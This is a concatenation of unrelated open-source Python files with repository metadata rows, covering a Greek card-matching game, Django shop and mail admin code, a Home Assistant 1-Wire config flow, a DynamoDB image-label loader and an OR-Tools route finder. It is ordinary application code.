    print("Καλώς ήρθατε στο Matching Game")
    flag = False
    while (flag == False):
        x = input("Δώστε αριθμό παιχτών:")
        x = int(x)
        if (x >= 2):
            flag = True
        else:
            print("Δώστε έγκυρο αριθμό παιχτών (τουλάχιστον 2)")
    flag2 = False
    while (flag2 == False):
        y = input("Δώστε επίπεδο δυσκολίας Εύκολο (1), Μέτριο (2), Δύσκολο (3) :")
        y = int(y)
        if ((y == 1) or (y == 2) or (y == 3)):
            flag2 = True
        else:
            print("Δώστε έγκυρο επίπεδο δυσκολίας")
    deck_size = {1: 16, 2: 40, 3: 52}[y]
    draw_board = {1: Easy, 2: Medium, 3: Hard}[y]
    _run_game(x, y, deck_size, draw_board)

#Shared game loop for every difficulty (deck size and board renderer are injected)
def _run_game(num_players, level, deck_size, draw_board):
    """Play one full game: initial reveal, turns, scoring and winner announcement.

    Special cards (as in the original logic): matching a pair of J's lets the
    same player keep the turn; matching K's advances the player counter an
    extra time, i.e. the next player is skipped.
    """
    PlayerPoints = [0] * num_players
    CardsOpen = []
    Player = 1
    PlayerTurn = False  # True -> current player keeps the next turn (J pair)
    AllCards = []
    CardSet(deck_size, AllCards)
    random.shuffle(AllCards)
    # Briefly reveal the whole board, then hide it again.
    SetStateAll(True, AllCards, deck_size)
    draw_board(AllCards)
    SetStateAll(False, AllCards, deck_size)
    draw_board(AllCards)
    gamefinished = False
    while (gamefinished == False):
        check = False
        while (check == False):
            check = Turn(AllCards, Player, level, CardsOpen)
        desc1 = AllCards[CardsOpen[0]].GetDesc()
        desc2 = AllCards[CardsOpen[1]].GetDesc()
        # Two cards match when the first character of their labels (the rank) agrees.
        if (desc1[0] == desc2[0]):
            PlayerPoints[Player - 1] += AllCards[CardsOpen[0]].GetValue()
            print("Επιτυχές ταίριασμα +" + str(AllCards[CardsOpen[0]].GetValue()) + " πόντοι! Παίκτη " + str(Player) + " έχεις συνολικά " + str(PlayerPoints[Player - 1]) + " πόντους.")
            #Special cards
            if (desc1[0] == "J"):
                PlayerTurn = True
            elif (desc1[0] == "K"):
                if (Player + 1 > num_players):
                    Player = 1
                else:
                    Player += 1
            CardsOpen.clear()
        else:
            # No match: close both cards again.
            AllCards[CardsOpen[0]].SetStat(False)
            AllCards[CardsOpen[1]].SetStat(False)
            CardsOpen.clear()
        # Advance to the next player unless a J pair granted an extra turn.
        if (Player + 1 > num_players and PlayerTurn == False):
            Player = 1
        elif (PlayerTurn == False):
            Player += 1
        PlayerTurn = False
        gamefinished = CheckGame(AllCards)
    GameWinner(PlayerPoints)
#Class that represents a single playing card as suggested in the instructions
class Card:
    """A playing card: suit symbol, points value, display label and open/closed state."""

    # Suit symbol -> English suit name.
    # Bug fix: the original mapped "♠" to "Clubs" and "♣" to "Spades" (swapped).
    _COLORS = {"♥": "Hearts", "♦": "Diamonds", "♠": "Spades", "♣": "Clubs"}

    def __init__(self, symbol, value, desc, status):
        self._symbol = symbol
        # Unknown symbols now yield None instead of leaving _color unset.
        self._color = Card._COLORS.get(symbol)
        self._value = value
        self._desc = desc
        self._status = status

    #Setters-Getters
    def GetSymb(self):
        return self._symbol

    def GetDesc(self):
        return self._desc

    def GetValue(self):
        return self._value

    def GetStat(self):
        return self._status

    def GetColor(self):
        return self._color

    def SetStat(self, status):
        self._status = status
# Launch the game immediately when the module is executed (script-style module).
main()
| UTF-8 | Python | false | false | 21,206 | py | 8 | MatchingGame.py | 6 | 0.470902 | 0.446605 | 0 | 519 | 37.32948 | 183 |
Aamir-M-Khan/CTPelvic1K | 6,012,954,238,965 | 4090809d6ab9cbb33f22cbdc724685ee9e843bf5 | 1b8c5fcf088b13fae304d3c07682732bc4d781c6 | /nnunet/utilities/file_endings.py | d7f34510bfc3dca3ea108196dadbf30d50d16e86 | [] | no_license | https://github.com/Aamir-M-Khan/CTPelvic1K | 7e1d46dc0483bad9ee621964f4538d3619d79d54 | 79c9b125633803c242b4bf23e3fbf4ec652fdd3d | refs/heads/main | "2023-09-05T17:24:56.544524" | "2021-11-19T14:53:49" | "2021-11-19T14:53:49" | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from batchgenerators.utilities.file_and_folder_operations import *
def remove_trailing_slash(filename: str):
    """Normalize *filename*; normpath also drops any trailing path separator."""
    normalized = os.path.normpath(filename)
    return normalized
def get_last_folder(foldername: str):
    """Return the name of the last folder in *foldername*, ignoring a trailing slash.

    Bug fix: the original referenced the undefined name ``folder`` (NameError);
    it now uses the ``foldername`` parameter (normpath + basename, matching the
    remove_trailing_slash helper's behavior).
    """
    return os.path.basename(os.path.normpath(foldername))
def maybe_add_0000_to_all_niigz(folder):
    """Rename every ``*.nii.gz`` file in *folder* so its name ends in ``_0000.nii.gz``.

    Files already carrying the ``_0000`` suffix are left untouched.
    """
    suffix = '.nii.gz'
    marker = '_0000.nii.gz'
    for path in subfiles(folder, suffix=suffix):
        path = remove_trailing_slash(path)
        if path.endswith(marker):
            continue
        os.rename(path, path[:-len(suffix)] + marker)
| UTF-8 | Python | false | false | 526 | py | 21 | file_endings.py | 20 | 0.623574 | 0.598859 | 0 | 15 | 32.266667 | 66 |
pta2002/okshop | 10,333,691,353,220 | 3dff261655841ef367f261e40c6a4e3acef16507 | d7090a8bcd87d368b935df1bcf2ea764e2165cad | /shop/admin.py | 548fc5b0d2fba3b5e802af685f48537103a76090 | [
"MIT"
] | permissive | https://github.com/pta2002/okshop | e792549330bf69aaaea4518ba5ed13a41d863983 | 59dd6867e9282a41b66326b389ca160fd27a6218 | refs/heads/master | "2021-01-13T04:42:10.615454" | "2018-11-21T17:34:15" | "2018-11-21T17:34:15" | 79,274,126 | 2 | 1 | MIT | false | "2018-11-21T17:34:17" | "2017-01-17T21:33:34" | "2017-01-17T22:42:18" | "2018-11-21T17:34:16" | 286 | 1 | 1 | 0 | JavaScript | false | null | from django.contrib import admin
from .models import *
# Register your models here.
class ShippingCountryInline(admin.TabularInline):
    """Tabular inline for ShippingCountry rows, rendered under the 'collapse' section."""
    model = ShippingCountry
    classes = ['collapse']
class ProductImageInline(admin.StackedInline):
    """Stacked inline for ProductImage rows, rendered under the 'collapse' section."""
    model = ProductImage
    classes = ['collapse']
class DigitalFileInline(admin.StackedInline):
    """Stacked inline for DigitalFile rows, rendered under the 'collapse' section."""
    model = DigitalFile
    classes = ['collapse']
class DigitalKeyInline(admin.TabularInline):
    """Tabular inline for DigitalKey rows, rendered under the 'collapse' section."""
    model = DigitalKey
    classes = ['collapse']
@admin.register(DigitalKeySet)
class KeySetAdmin(admin.ModelAdmin):
    """Admin for digital key sets: name/product/stock columns with keys edited inline."""
    list_display = ('name', 'product', 'get_stock')
    inlines = [DigitalKeyInline]
@admin.register(Product)
class ProductAdmin(admin.ModelAdmin):
    """Admin for products: listing columns, moderation filters and a grouped edit form."""
    list_display = ('product_name', 'seller', 'get_rating', 'price', 'stock',
                    'physical', 'approved', 'removed')
    list_filter = ('approved', 'physical', 'worldwide_shipping',
                   'free_shipping', 'removed')
    # Edit form grouped into product info, moderation, shipping and digital sections.
    fieldsets = (
        ('Product info', {
            'fields': ('product_name', 'product_description',
                       ('price', 'price_currency', 'cached_rate'),
                       'seller', ('removed', 'delete_on_over'))}),
        ('Moderation', {'fields': ('approved',)}),
        ('Shipping/Delivery', {
            'fields': (('stock', 'physical'),
                       ('ships_from', 'worldwide_shipping'),
                       ('local_price', 'outside_price', 'free_shipping'))}),
        ('Digital', {
            'fields': ('redeeming_instructions',
                       ('unlimited_stock', 'can_purchase_multiple'))})
    )
    inlines = (ProductImageInline, DigitalFileInline, ShippingCountryInline)
class CartEntryInline(admin.TabularInline):
    """Tabular inline for a cart's entries; the stock indicator is display-only."""
    model = CartEntry
    readonly_fields = ['in_stock']
@admin.register(Cart)
class CartAdmin(admin.ModelAdmin):
    """Admin for carts: summary columns plus the cart entries edited inline."""
    list_display = ('user', 'get_number_of_items', 'gettotal', 'has_physical_items')
    readonly_fields = ('user', 'gettotal')
    inlines = [CartEntryInline]
@admin.register(UserExtra)
class UserExtraAdmin(admin.ModelAdmin):
    """Admin for per-user extra data: verification, wallet balances and 2FA fields."""
    list_display = ('user', 'verified', 'get_balance', 'get_pending')
    list_filter = ('verified',)
    # Balances are accessor methods, so they can only be shown read-only.
    readonly_fields = ('get_balance', 'get_pending')
    fieldsets = [
        ('User info', {'fields': ['user']}),
        ('Moderation', {'fields': ['verified']}),
        ('Wallet', {'fields': [('get_balance', 'get_pending')]}),
        ('2FA', {'fields': [('authenticator_id', 'authenticator_verified')]}),
    ]
@admin.register(Wallet)
class WalletAdmin(admin.ModelAdmin):
    """Admin for wallets; only the 'active' flag is editable from the changelist."""
    list_display = ('label', 'user', 'address', 'get_balance', 'get_pending', 'active')
    list_filter = ('active',)
    list_editable = ('active',)
    readonly_fields = ('user', 'get_balance', 'get_pending', 'address')
    fieldsets = [
        ('Moderation', {'fields': [('user', 'active')]}),
        ('Wallet info', {'fields': [('label', 'address'), ('get_balance', 'get_pending')]})
    ]
class PurchaseItemInline(admin.TabularInline):
    """Tabular inline listing the items belonging to a purchase."""
    model = PurchaseItem
@admin.register(Purchase)
class PurchaseAdmin(admin.ModelAdmin):
    """Admin for purchases; identity fields are immutable, moderation notes collapsible."""
    list_display = ('by', 'get_price', 'get_number_of_items')
    readonly_fields = ('by', 'date', 'uuid')
    fieldsets = (
        (None, {'fields': (('by', 'uuid'), 'date')}),
        ('Moderation', {'fields': ('notes',), 'classes': ['collapse']})
    )
    inlines = [PurchaseItemInline]
class ReviewVoteInline(admin.TabularInline):
    """Tabular inline for the votes cast on a review."""
    model = ReviewVote
@admin.register(Review)
class ReviewAdmin(admin.ModelAdmin):
    """Admin for product reviews, with their votes edited inline."""
    list_display = ('product', 'title', 'get_score', 'get_percentage')
    inlines = [ReviewVoteInline]
# Models registered with the default ModelAdmin (no customization needed).
admin.site.register(UserShop)
admin.site.register(ShippingUpdate)
| UTF-8 | Python | false | false | 3,692 | py | 56 | admin.py | 15 | 0.613489 | 0.613218 | 0 | 117 | 30.555556 | 91 |
hagen93/dumpmail | 8,246,337,247,428 | 24239badad1b8f89d43af0d6c7fccb9805d61c4e | 8855ec1d968c0f8415a80d269517604aace02708 | /mail/views.py | 656cd932c53d0f992fd03838de47e8b456b4dd6f | [
"MIT"
] | permissive | https://github.com/hagen93/dumpmail | 67d6c6c96192ecebfb0b800d971788152bdf5be1 | dcd80d290bcb2408b9205c2b31767b4a2c70c327 | refs/heads/master | "2020-05-23T12:39:54.543734" | "2017-03-13T01:01:46" | "2017-03-13T01:01:46" | 84,769,352 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django.conf import settings
from django.shortcuts import render
from mailbox import mbox
from mail.utils import parse_message, message_or_404
def mail(request, item_id):
    """Render the mailbox page; item_id selects the message to display (may be falsy)."""
    mbox_file = getattr(settings, "MBOX_FILE", None)
    if not mbox_file:
        # No mailbox configured: render an empty listing.
        return render(request, 'mail/mail.html', {'all_mail': [], 'current_mail': None})
    mailbox = mbox(mbox_file)
    selected = None
    if item_id:
        selected = parse_message(item_id, message_or_404(mailbox, item_id))
    context = {
        # The listing is a generator, so messages are parsed lazily by the template.
        'all_mail': (parse_message(item, message) for item, message in enumerate(mailbox)),
        'current_mail': selected,
    }
    return render(request, 'mail/mail.html', context)
| UTF-8 | Python | false | false | 675 | py | 7 | views.py | 5 | 0.617778 | 0.608889 | 0 | 23 | 28.304348 | 106 |
home-assistant/core | 7,997,229,132,320 | 052f68fdd983374f0b55dea2499435660b97214a | 96dcea595e7c16cec07b3f649afd65f3660a0bad | /homeassistant/components/onewire/config_flow.py | 4764e3b2a550a273e9492c21d8b68e7f3c4fd440 | [
"Apache-2.0"
] | permissive | https://github.com/home-assistant/core | 3455eac2e9d925c92d30178643b1aaccf3a6484f | 80caeafcb5b6e2f9da192d0ea6dd1a5b8244b743 | refs/heads/dev | "2023-08-31T15:41:06.299469" | "2023-08-31T14:50:53" | "2023-08-31T14:50:53" | 12,888,993 | 35,501 | 20,617 | Apache-2.0 | false | "2023-09-14T21:50:15" | "2013-09-17T07:29:48" | "2023-09-14T21:50:03" | "2023-09-14T21:50:15" | 470,852 | 62,888 | 24,675 | 2,641 | Python | false | false | """Config flow for 1-Wire component."""
from __future__ import annotations
from typing import Any
import voluptuous as vol
from homeassistant.config_entries import (
ConfigEntry,
ConfigFlow,
OptionsFlowWithConfigEntry,
)
from homeassistant.const import CONF_HOST, CONF_PORT
from homeassistant.core import HomeAssistant, callback
from homeassistant.data_entry_flow import FlowResult
from homeassistant.helpers import config_validation as cv, device_registry as dr
from homeassistant.helpers.device_registry import DeviceEntry
from .const import (
DEFAULT_HOST,
DEFAULT_PORT,
DEVICE_SUPPORT_OPTIONS,
DOMAIN,
INPUT_ENTRY_CLEAR_OPTIONS,
INPUT_ENTRY_DEVICE_SELECTION,
OPTION_ENTRY_DEVICE_OPTIONS,
OPTION_ENTRY_SENSOR_PRECISION,
PRECISION_MAPPING_FAMILY_28,
)
from .onewirehub import CannotConnect, OneWireHub
DATA_SCHEMA = vol.Schema(
{
vol.Required(CONF_HOST, default=DEFAULT_HOST): str,
vol.Required(CONF_PORT, default=DEFAULT_PORT): int,
}
)
async def validate_input(hass: HomeAssistant, data: dict[str, Any]) -> dict[str, str]:
"""Validate the user input allows us to connect.
Data has the keys from DATA_SCHEMA with values provided by the user.
"""
hub = OneWireHub(hass)
host = data[CONF_HOST]
port = data[CONF_PORT]
# Raises CannotConnect exception on failure
await hub.connect(host, port)
# Return info that you want to store in the config entry.
return {"title": host}
class OneWireFlowHandler(ConfigFlow, domain=DOMAIN):
"""Handle 1-Wire config flow."""
VERSION = 1
def __init__(self) -> None:
"""Initialize 1-Wire config flow."""
self.onewire_config: dict[str, Any] = {}
async def async_step_user(
self, user_input: dict[str, Any] | None = None
) -> FlowResult:
"""Handle 1-Wire config flow start.
Let user manually input configuration.
"""
errors: dict[str, str] = {}
if user_input:
# Prevent duplicate entries
self._async_abort_entries_match(
{
CONF_HOST: user_input[CONF_HOST],
CONF_PORT: user_input[CONF_PORT],
}
)
self.onewire_config.update(user_input)
try:
info = await validate_input(self.hass, user_input)
except CannotConnect:
errors["base"] = "cannot_connect"
else:
return self.async_create_entry(
title=info["title"], data=self.onewire_config
)
return self.async_show_form(
step_id="user",
data_schema=DATA_SCHEMA,
errors=errors,
)
@staticmethod
@callback
def async_get_options_flow(config_entry: ConfigEntry) -> OnewireOptionsFlowHandler:
"""Get the options flow for this handler."""
return OnewireOptionsFlowHandler(config_entry)
class OnewireOptionsFlowHandler(OptionsFlowWithConfigEntry):
"""Handle OneWire Config options."""
configurable_devices: dict[str, str]
"""Mapping of the configurable devices.
`key`: friendly name
`value`: onewire id
"""
devices_to_configure: dict[str, str]
"""Mapping of the devices selected for configuration.
`key`: friendly name
`value`: onewire id
"""
current_device: str
"""Friendly name of the currently selected device."""
async def async_step_init(
self, user_input: dict[str, Any] | None = None
) -> FlowResult:
"""Manage the options."""
device_registry = dr.async_get(self.hass)
self.configurable_devices = {
self._get_device_friendly_name(device, device.name): device.name
for device in dr.async_entries_for_config_entry(
device_registry, self.config_entry.entry_id
)
if device.name and device.name[0:2] in DEVICE_SUPPORT_OPTIONS
}
if not self.configurable_devices:
return self.async_abort(reason="No configurable devices found.")
return await self.async_step_device_selection(user_input=None)
async def async_step_device_selection(
self, user_input: dict[str, Any] | None = None
) -> FlowResult:
"""Select what devices to configure."""
errors = {}
if user_input is not None:
if user_input.get(INPUT_ENTRY_CLEAR_OPTIONS):
# Reset all options
return self.async_create_entry(data={})
selected_devices: list[str] = (
user_input.get(INPUT_ENTRY_DEVICE_SELECTION) or []
)
if selected_devices:
self.devices_to_configure = {
friendly_name: self.configurable_devices[friendly_name]
for friendly_name in selected_devices
}
return await self.async_step_configure_device(user_input=None)
errors["base"] = "device_not_selected"
return self.async_show_form(
step_id="device_selection",
data_schema=vol.Schema(
{
vol.Optional(
INPUT_ENTRY_CLEAR_OPTIONS,
default=False,
): bool,
vol.Optional(
INPUT_ENTRY_DEVICE_SELECTION,
default=self._get_current_configured_sensors(),
description="Multiselect with list of devices to choose from",
): cv.multi_select(
{
friendly_name: False
for friendly_name in self.configurable_devices
}
),
}
),
errors=errors,
)
async def async_step_configure_device(
self, user_input: dict[str, Any] | None = None
) -> FlowResult:
"""Config precision option for device."""
if user_input is not None:
self._update_device_options(user_input)
if self.devices_to_configure:
return await self.async_step_configure_device(user_input=None)
return self.async_create_entry(data=self.options)
self.current_device, onewire_id = self.devices_to_configure.popitem()
data_schema = vol.Schema(
{
vol.Required(
OPTION_ENTRY_SENSOR_PRECISION,
default=self._get_current_setting(
onewire_id, OPTION_ENTRY_SENSOR_PRECISION, "temperature"
),
): vol.In(PRECISION_MAPPING_FAMILY_28),
}
)
return self.async_show_form(
step_id="configure_device",
data_schema=data_schema,
description_placeholders={"sensor_id": self.current_device},
)
@staticmethod
def _get_device_friendly_name(entry: DeviceEntry, onewire_id: str) -> str:
if entry.name_by_user:
return f"{entry.name_by_user} ({onewire_id})"
return onewire_id
def _get_current_configured_sensors(self) -> list[str]:
"""Get current list of sensors that are configured."""
configured_sensors = self.options.get(OPTION_ENTRY_DEVICE_OPTIONS)
if not configured_sensors:
return []
return [
friendly_name
for friendly_name, onewire_id in self.configurable_devices.items()
if onewire_id in configured_sensors
]
def _get_current_setting(self, device_id: str, setting: str, default: Any) -> Any:
"""Get current value for setting."""
if entry_device_options := self.options.get(OPTION_ENTRY_DEVICE_OPTIONS):
if device_options := entry_device_options.get(device_id):
return device_options.get(setting)
return default
def _update_device_options(self, user_input: dict[str, Any]) -> None:
"""Update the global config with the new options for the current device."""
options: dict[str, dict[str, Any]] = self.options.setdefault(
OPTION_ENTRY_DEVICE_OPTIONS, {}
)
onewire_id = self.configurable_devices[self.current_device]
device_options: dict[str, Any] = options.setdefault(onewire_id, {})
if onewire_id[0:2] == "28":
device_options[OPTION_ENTRY_SENSOR_PRECISION] = user_input[
OPTION_ENTRY_SENSOR_PRECISION
]
self.options.update({OPTION_ENTRY_DEVICE_OPTIONS: options})
| UTF-8 | Python | false | false | 8,667 | py | 11,073 | config_flow.py | 9,921 | 0.584401 | 0.58267 | 0 | 253 | 33.256917 | 87 |
roberthluo/Instagram-Account-Analytics | 14,542,759,309,408 | a605e59d7e961fd579190f3a3adfa1a925f9478f | e8741de9f90bbf888dd3909c3556c7dd6a20248d | /parser.py | 2d180107f82f94e070bfb23a7ac3071e90cc7b17 | [] | no_license | https://github.com/roberthluo/Instagram-Account-Analytics | 6b577c157408ec36106b4a903c279c8875063ff6 | 49a8b3bdfdf8e1de40af628151c717f45e2fdaf9 | refs/heads/master | "2021-03-24T10:00:57.354209" | "2018-04-09T01:08:49" | "2018-04-09T01:08:49" | 117,874,255 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import json
import boto3
from collections import OrderedDict
# Input produced by the image-analysis step.
file_name = 'output.json'
# Begin connection to DynamoDB (resource API for tables, low-level client for listings).
dynamodb = boto3.resource('dynamodb')
client = boto3.client('dynamodb')
# Get array of table names associated with the current AWS account.
table_names = client.list_tables()
# Read json data from the json file and store it in json_data.
# NOTE(review): this runs at import time, so importing the module performs
# file and AWS I/O.
with open(file_name, 'r') as data_file:
    json_data = data_file.read()
# Store a list where each item is a dict describing one analyzed image.
img_result_list = json.loads(json_data)
# Ensure the DynamoDB "imagetags" table exists, then load the parsed labels into it.
def checkExists():
    """Create the imagetags table when missing, then insert the image tags.

    Improvement: insertTuples() is now called once after the table handle is
    obtained, instead of being duplicated in both branches.
    """
    if 'imagetags' not in table_names['TableNames']:
        # Table is missing: create it keyed on username and wait until it is ready.
        table = dynamodb.create_table(
            TableName='imagetags',
            KeySchema=[
                {
                    'AttributeName': 'username',
                    'KeyType': 'HASH'
                }
            ],
            AttributeDefinitions=[
                {
                    'AttributeName': 'username',
                    'AttributeType': 'S'
                }
            ],
            ProvisionedThroughput={
                'ReadCapacityUnits': 5,
                'WriteCapacityUnits': 5
            }
        )
        table.meta.client.get_waiter('table_exists').wait(TableName='imagetags')
    else:
        table = dynamodb.Table('imagetags')
    insertTuples(table)
def insertTuples(table, img_result_list = img_result_list):
    """Group image labels by username and insert one item per user into *table*.

    Assumes img_result_list is ordered so all images of a user are consecutive;
    each inserted item has the shape {'username': ..., 'label1': ..., 'labelN': ...}.

    NOTE(review): if img_result_list is empty, `username` is unbound at the
    final flush below and this raises NameError -- confirm the input file is
    never empty.
    NOTE(review): a user whose images have no label above 90 confidence is
    silently dropped when the next username starts (count stays 0).
    """
    prev_user = ''
    count = 0
    obj = {}
    fields = []
    result = []
    for img in img_result_list:
        # Access each individual image's rekognizer output.
        file_name = img["File_Name"] # NOTE(review): shadows the module-level file_name
        labels_list = img["Analysis"]["Labels"] # list of tag dicts
        username = str(file_name.split('/')[1].strip()) # username from the filepath
        # Flush the previous user's accumulated labels once a new username shows up.
        if(username != prev_user):
            if(count > 0):
                obj['username'] = prev_user
                obj['fields'] = fields
                result.append(obj.copy())
                fields = [] # reset fields for the next username
                count = 0
            for label in labels_list:
                if label['Confidence'] > 90:
                    # Only keep labels with over 90 confidence.
                    fields.append(label['Name'])
                    count = count + 1
            prev_user = username
        else:
            # Same user as the previous image: keep accumulating labels.
            for label in labels_list:
                if label['Confidence'] > 90:
                    fields.append(label['Name'])
                    count = count + 1
    # At the end add the last username and its label list.
    obj['username'] = username
    obj['fields'] = fields
    result.append(obj.copy())
    list_items = []
    for i in result:
        num = 1
        # Flatten each username/labels pair into label1..labelN attributes.
        item = OrderedDict()
        item['username'] = i['username']
        for tag in i['fields']:
            label_string = 'label' + str(num)
            item[label_string] = tag
            num += 1
        list_items.append(item.copy())
    for user in list_items:
        print(user)
        table.put_item(Item = user)
# Module entry point: ensure the table exists and upload all image tags.
checkExists()
| UTF-8 | Python | false | false | 2,952 | py | 9 | parser.py | 6 | 0.611111 | 0.604675 | 0 | 105 | 26.095238 | 91 |
munnellg/elltm | 9,251,359,598,463 | d1888ab5f091a3ed8d739d84db035fa00d8cf2e6 | 9f90abd6db3125c6ce0946e5a7d76fcc97cd49d3 | /to_line_corpus.py | 7aebb9a96b74885cf9e501bfe5720d8cd8520c6a | [
"MIT"
] | permissive | https://github.com/munnellg/elltm | 68c7c3d155bca49ffab46fc05273478160b5f945 | ccb80d1f16145f35df5042a304a5a09faf4021e0 | refs/heads/master | "2021-01-10T06:54:06.047349" | "2015-12-09T13:53:42" | "2015-12-09T13:53:42" | 47,148,792 | 3 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import sys
import bz2
from optparse import OptionParser
from docs import config
from lib.tokenizer import text_to_sentences
def build_opt_parser():
usage = "usage: %prog [options] <filename> [, <filename>, ...]"
parser = OptionParser(usage=usage)
parser.add_option("-o", "--out-file", dest="out_file",
default=config.default_line_out_file,
help="The file to which the output will be written"
)
return parser
# Parse commandline arguments using OptionParser given
def parse_arguments(parser):
(options, args) = parser.parse_args()
if len(args) < 1:
parser.print_help()
exit()
return options, args
def main():
parser = build_opt_parser()
(options, args) = parse_arguments(parser)
with bz2.BZ2File(options.out_file, 'w') as line_corpus:
for fname in args:
with open(fname, "r") as f:
fcontents = f.read()
sentences = text_to_sentences(fcontents)
for sentence in sentences:
line_corpus.write('{0}\n'.format(sentence))
if __name__ == "__main__":
main()
| UTF-8 | Python | false | false | 1,158 | py | 16 | to_line_corpus.py | 14 | 0.595855 | 0.591537 | 0 | 42 | 26.571429 | 73 |
dguptaruby/travellers_route | 3,161,095,932,503 | a83e2b81f377a5ac43c9a1e651d381fe031ba670 | 9f7719573155b80e7875c4b9bb80ddbe6430405d | /traveller/utils.py | 59ce1151fc3b35f51d80c428708266a5769c9650 | [] | no_license | https://github.com/dguptaruby/travellers_route | ff07189346c712f280bc08166d6d5fc873b6b81c | 6d9c2274e88faece5be18199ae6b08d93db85bc5 | refs/heads/main | "2023-08-01T22:52:11.896118" | "2021-09-15T10:14:36" | "2021-09-15T10:14:36" | 406,672,805 | 0 | 0 | null | false | "2021-09-15T10:06:15" | "2021-09-15T08:21:36" | "2021-09-15T09:57:20" | "2021-09-15T10:06:14" | 8 | 0 | 0 | 0 | Python | false | false | """Simple travelling salesman problem between cities."""
import math
from math import cos
from math import sin
from math import asin
from math import sqrt
from math import radians
from collections import namedtuple
from ortools.constraint_solver import routing_enums_pb2
from ortools.constraint_solver import pywrapcp
import numpy as np
# Declaring namedtuple()
Location = namedtuple("Point", ["longitude", "latitude"])
class RouteFinder:
def __init__(
self, distance_matrix, coordinate_list=None, num_vehicles=None, depot=None
):
self.coordinate_list = coordinate_list
self.data = {
"distance_matrix": distance_matrix,
"num_vehicles": num_vehicles if num_vehicles else 1,
"depot": depot if depot else 0,
}
self.response = {}
def print_solution(self, manager, routing, solution):
# self.response['Objective'] = '{} miles'.format(solution.ObjectiveValue())
index = routing.Start(0)
plan_output = "Route for vehicle: "
route_distance = 0
while not routing.IsEnd(index):
plan_output += " {} ->".format(
self.coordinate_list[manager.IndexToNode(index)]
)
previous_index = index
index = solution.Value(routing.NextVar(index))
route_distance += routing.GetArcCostForVehicle(previous_index, index, 0)
plan_output += " {}".format(self.coordinate_list[manager.IndexToNode(index)])
self.response["plan_output"] = plan_output
# self.response['Route distance']= '{} miles'.format(route_distance)
def find_route(self):
"""Entry point of the program."""
# Create the routing index manager.
manager = pywrapcp.RoutingIndexManager(
len(self.data["distance_matrix"]),
self.data["num_vehicles"],
self.data["depot"],
)
# Create Routing Model.
routing = pywrapcp.RoutingModel(manager)
def distance_callback(from_index, to_index):
"""Returns the distance between the two nodes."""
# Convert from routing variable Index to distance matrix NodeIndex.
from_node = manager.IndexToNode(from_index)
to_node = manager.IndexToNode(to_index)
return self.data["distance_matrix"][from_node][to_node]
transit_callback_index = routing.RegisterTransitCallback(distance_callback)
# Define cost of each arc.
routing.SetArcCostEvaluatorOfAllVehicles(transit_callback_index)
# Setting first solution heuristic.
search_parameters = pywrapcp.DefaultRoutingSearchParameters()
search_parameters.first_solution_strategy = (
routing_enums_pb2.FirstSolutionStrategy.PATH_CHEAPEST_ARC
)
# Solve the problem.
solution = routing.SolveWithParameters(search_parameters)
# Print solution on console.
if solution:
self.print_solution(manager, routing, solution)
return self.response
class DistanceMatrix:
def __init__(self, coordinate_sequence):
self.source = coordinate_sequence
self.destination = coordinate_sequence
self.distance_matrix = []
def haversine(self, pointA, pointB):
if (type(pointA) != tuple) or (type(pointB) != tuple):
raise TypeError("Only tuples are supported as arguments")
lat1 = pointA[1]
lon1 = pointA[0]
lat2 = pointB[1]
lon2 = pointB[0]
# convert decimal degrees to radians
lat1, lon1, lat2, lon2 = map(
radians, [float(lat1), float(lon1), float(lat2), float(lon2)]
)
# haversine formula
dlon = lon2 - lon1
dlat = lat2 - lat1
a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2
c = 2 * asin(sqrt(a))
r = 6371 # Radius of earth in kilometers. Use 3956 for miles
# returns result in kilometer
return c * r
def sqrt_distance(self, pointA, pointB):
lat1 = pointA[1]
lon1 = pointA[0]
lat2 = pointB[1]
lon2 = pointB[0]
dlon = lon2 - lon1
dlat = lat2 - lat1
return math.sqrt(dlon ** 2 + dlat ** 2)
def create_distance_matrix(self):
for pointA in self.source:
row = []
for pointB in self.destination:
row.append(self.sqrt_distance(pointA, pointB))
self.distance_matrix.append(row)
return self.distance_matrix
| UTF-8 | Python | false | false | 4,530 | py | 5 | utils.py | 3 | 0.61479 | 0.602428 | 0 | 127 | 34.669291 | 85 |
xyloguy/cs1410-2018-20-50-examples | 2,087,354,121,651 | 180ae33c1381c29c3bece617e429ebb6a7fe461b | 5e95f55385b84c233b6151c6d3974fa931617ee5 | /2018-03-07_inheritance/marker/sharpiemarker.py | c40fff40df9b2795b9bed5620343adad605bb69f | [] | no_license | https://github.com/xyloguy/cs1410-2018-20-50-examples | 3e95988a22389b9ad83599c3a975135fb022b572 | 1d0e145bc8102e5e3e5dd0d4b92e1b455b47aa36 | refs/heads/master | "2021-05-05T14:19:21.559204" | "2018-04-26T01:22:25" | "2018-04-26T01:22:25" | 118,478,575 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from marker import Marker
class SharpieMarker(Marker):
def __init__(self, color):
Marker.__init__(self, color, 3, 0.005, False)
if __name__ == '__main__':
red_sharpie = SharpieMarker((255, 0, 0))
red_sharpie.set_owner('Bob')
print(red_sharpie.write(), red_sharpie.color, red_sharpie.tip, red_sharpie.owner)
| UTF-8 | Python | false | false | 335 | py | 64 | sharpiemarker.py | 61 | 0.635821 | 0.60597 | 0 | 12 | 26.916667 | 85 |
TamakiRinko/HuaQiBei | 14,611,478,746,992 | de4f9d0a4ac22ea18eeb37fc25dfc81369e47f32 | 05a136b3552ff14ae88a6ff72e01b42d35a750d7 | /推荐及更新/Temp.py | 92f00c11e1c35089eea4f6a9bf2ebc67ea176a2a | [] | no_license | https://github.com/TamakiRinko/HuaQiBei | 2fe44d6fe38b588910ce1aa12a3f1785cf6ff296 | b6c206d39d3f0d16d374da25bc2a10710279c7d2 | refs/heads/master | "2020-07-08T15:15:05.355791" | "2019-10-10T03:56:07" | "2019-10-10T03:56:07" | 203,709,595 | 2 | 2 | null | null | null | null | null | null | null | null | null | null | null | null | null | import surprise as sp
list = [1, 3]
print(list)
| UTF-8 | Python | false | false | 49 | py | 46 | Temp.py | 22 | 0.673469 | 0.632653 | 0 | 4 | 11.25 | 21 |
